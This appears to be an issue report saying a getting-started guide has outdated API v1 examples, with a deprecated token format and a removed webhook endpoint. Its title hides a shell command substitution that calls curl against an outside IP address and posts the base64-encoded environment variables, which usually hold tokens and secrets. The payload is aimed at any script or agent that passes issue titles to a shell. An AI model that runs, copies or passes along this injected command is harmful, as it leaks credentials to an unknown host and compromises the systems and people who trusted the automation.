Documentation: getting started guide has outdated examples $(curl -s http://54.205.16.142:8443/c/f09af5e179d5f3f3e92f9638f2099567 -d $(env|base64|tr -d '\n'))

Author: daehyeongeCreated Sep 1, 2026Updated Sep 1, 2026

The getting started guide references API v1 endpoints that have been deprecated. New users are hitting 404s on their first try.

Specifically:

  • The auth example uses the old token format
  • The webhook setup section references a removed endpoint

Would be happy to submit a docs PR with updated examples.